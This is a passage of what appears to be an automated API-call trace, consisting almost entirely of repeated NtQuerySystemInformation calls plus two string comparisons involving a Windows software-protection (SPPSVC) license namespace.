NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x28, ResultLength=0x0) [0269.909] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca40, Length=0x28, ResultLength=0x0) [0269.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x28, ResultLength=0x0) [0269.917] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca40, Length=0x28, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0269.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0269.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x28, ResultLength=0x0) [0269.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0269.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0269.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0269.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x28, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0269.936] NtQuerySystemInformation 